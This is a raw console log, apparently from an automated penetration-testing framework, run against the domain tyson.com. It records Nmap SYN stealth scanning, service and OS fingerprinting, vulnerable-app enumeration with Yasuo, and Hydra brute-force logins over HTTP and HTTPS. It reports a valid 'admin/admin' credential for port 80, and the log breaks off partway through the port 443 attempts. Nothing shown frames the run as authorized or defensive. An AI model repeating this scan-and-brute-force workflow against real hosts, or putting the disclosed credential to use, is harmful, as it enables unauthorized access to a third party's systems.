- OS CPE: cpe:/o:oracle:virtualbox
- OS details: Oracle Virtualbox
- Network Distance: 2 hops
- TRACEROUTE (using port 80/tcp)
- HOP RTT ADDRESS
- 1 0.31 ms 10.0.2.2
- 2 0.40 ms 65.52.220.144
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 60.66 seconds
- + -- --=[Port 3632 closed... skipping.
- + -- --=[Port 4443 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 5984 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 closed... skipping.
- + -- --=[Port 8180 closed... skipping.
- + -- --=[Port 8443 closed... skipping.
- + -- --=[Port 8888 closed... skipping.
- + -- --=[Port 10000 closed... skipping.
- + -- --=[Port 27017 closed... skipping.
- + -- --=[Port 27018 closed... skipping.
- + -- --=[Port 27019 closed... skipping.
- + -- --=[Port 28017 closed... skipping.
- + -- --=[Port 49152 closed... skipping.
- + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
- Autoselected keyboard map en-us
- ERROR: Connection closed
- #########################################################################################
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #########################################################################################
- I, [2017-07-14T17:29:45.010726 #9183] INFO -- : Initiating port scan
- I, [2017-07-14T17:30:36.556152 #9183] INFO -- : Using nmap scan output file logs/nmap_output_2017-07-14_17-29-45.xml
- I, [2017-07-14T17:30:36.561898 #9183] INFO -- : Discovered open port: 65.52.220.144:80
- I, [2017-07-14T17:30:37.747002 #9183] INFO -- : Discovered open port: 65.52.220.144:443
- I, [2017-07-14T17:30:38.106157 #9183] INFO -- : <<<Enumerating vulnerable applications>>>
- --------------------------------------------------------
- <<<Yasuo discovered following vulnerable applications>>>
- --------------------------------------------------------
- +----------+--------------------+-------------------+----------+----------+
- | App Name | URL to Application | Potential Exploit | Username | Password |
- +----------+--------------------+-------------------+----------+----------+
- +----------+--------------------+-------------------+----------+----------+
- + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:32 EDT
- NSE: Loaded 40 scripts for scanning.
- Initiating Ping Scan at 17:32
- Scanning tyson.com (65.52.220.144) [4 ports]
- Completed Ping Scan at 17:32, 0.03s elapsed (1 total hosts)
- Initiating Parallel DNS resolution of 1 host. at 17:32
- Completed Parallel DNS resolution of 1 host. at 17:32, 11.05s elapsed
- Initiating SYN Stealth Scan at 17:32
- Scanning tyson.com (65.52.220.144) [65355 ports]
- Discovered open port 443/tcp on 65.52.220.144
- Discovered open port 3389/tcp on 65.52.220.144
- Discovered open port 80/tcp on 65.52.220.144
- SYN Stealth Scan Timing: About 5.19% done; ETC: 17:45 (0:12:11 remaining)
- Increasing send delay for 65.52.220.144 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
- SYN Stealth Scan Timing: About 8.08% done; ETC: 17:47 (0:13:16 remaining)
- SYN Stealth Scan Timing: About 14.48% done; ETC: 17:47 (0:12:30 remaining)
- SYN Stealth Scan Timing: About 22.03% done; ETC: 17:47 (0:11:44 remaining)
- SYN Stealth Scan Timing: About 32.33% done; ETC: 17:48 (0:10:55 remaining)
- SYN Stealth Scan Timing: About 38.70% done; ETC: 17:49 (0:10:05 remaining)
- SYN Stealth Scan Timing: About 44.49% done; ETC: 17:49 (0:09:15 remaining)
- SYN Stealth Scan Timing: About 50.00% done; ETC: 17:49 (0:08:22 remaining)
- SYN Stealth Scan Timing: About 55.13% done; ETC: 17:49 (0:07:30 remaining)
- SYN Stealth Scan Timing: About 60.88% done; ETC: 17:49 (0:06:40 remaining)
- SYN Stealth Scan Timing: About 65.95% done; ETC: 17:49 (0:05:46 remaining)
- SYN Stealth Scan Timing: About 70.98% done; ETC: 17:49 (0:04:54 remaining)
- SYN Stealth Scan Timing: About 76.15% done; ETC: 17:49 (0:04:00 remaining)
- SYN Stealth Scan Timing: About 81.20% done; ETC: 17:49 (0:03:09 remaining)
- SYN Stealth Scan Timing: About 86.59% done; ETC: 17:49 (0:02:15 remaining)
- SYN Stealth Scan Timing: About 91.83% done; ETC: 17:49 (0:01:22 remaining)
- SYN Stealth Scan Timing: About 96.87% done; ETC: 17:49 (0:00:31 remaining)
- Completed SYN Stealth Scan at 17:49, 1002.57s elapsed (65355 total ports)
- Initiating Service scan at 17:49
- Scanning 3 services on tyson.com (65.52.220.144)
- Completed Service scan at 17:49, 23.67s elapsed (3 services on 1 host)
- Initiating OS detection (try #1) against tyson.com (65.52.220.144)
- NSE: Script scanning 65.52.220.144.
- Initiating NSE at 17:49
- Completed NSE at 17:49, 1.12s elapsed
- Initiating NSE at 17:49
- Completed NSE at 17:49, 0.14s elapsed
- Nmap scan report for tyson.com (65.52.220.144)
- Host is up (0.025s latency).
- Not shown: 65352 filtered ports
- PORT STATE SERVICE VERSION
- 80/tcp open http Microsoft IIS httpd 8.0
- 443/tcp open https?
- 3389/tcp open ms-wbt-server?
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: bridge
- Running: Oracle Virtualbox
- OS CPE: cpe:/o:oracle:virtualbox
- OS details: Oracle Virtualbox
- TCP Sequence Prediction: Difficulty=17 (Good luck!)
- IP ID Sequence Generation: Incremental
- Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Read data files from: /usr/bin/../share/nmap
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 1041.06 seconds
- Raw packets sent: 131459 (5.784MB) | Rcvd: 728 (29.160KB)
- + -- ----------------------------=[Running Brute Force]=--------------------- -- +
- + -- --=[BruteX v1.5 by 1N3
- + -- --=[http://crowdshield.com
- ################################### Running Port Scan ##############################
- Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-14 17:49 EDT
- Nmap scan report for tyson.com (65.52.220.144)
- Host is up (0.019s latency).
- Not shown: 23 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 80/tcp open http
- 443/tcp open https
- 3389/tcp open ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds
- ################################### Running Brute Force ############################
- + -- --=[Port 21 closed... skipping.
- + -- --=[Port 22 closed... skipping.
- + -- --=[Port 23 closed... skipping.
- + -- --=[Port 25 closed... skipping.
- + -- --=[Port 80 opened... running tests...
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-14 17:50:04
- [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
- [DATA] max 1 task per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~23 tries per task
- [DATA] attacking service http-get on port 80
- [80][http-get] host: tyson.com login: admin password: admin
- [STATUS] attack finished for tyson.com (valid pair found)
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (http://www.thc.org/thc-hydra) finished at 2017-07-14 17:50:15
- + -- --=[Port 110 closed... skipping.
- + -- --=[Port 139 closed... skipping.
- + -- --=[Port 162 closed... skipping.
- + -- --=[Port 389 closed... skipping.
- + -- --=[Port 443 opened... running tests...
- Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
- Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-14 17:50:15
- [DATA] max 1 task per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~23 tries per task
- [DATA] attacking service http-get on port 443 with SSL
- [STATUS] 26.00 tries/min, 26 tries in 00:01h, 1495 to do in 00:58h, 1 active
- [STATUS] 14.33 tries/min, 43 tries in 00:03h, 1495 to do in 01:45h, 1 active
- [STATUS] 9.00 tries/min, 63 tries in 00:07h, 1495 to do in 02:47h, 1 active
- [STATUS] 6.75 tries/min, 81 tries in 00:12h, 1495 to do in 03:42h, 1 active
- [STATUS] 8.65 tries/min, 147 tries in 00:17h, 1478 to do in 02:51h, 1 active
- r[STATUS] 7.36 tries/min, 162 tries in 00:22h, 1463 to do in 03:19h, 1 active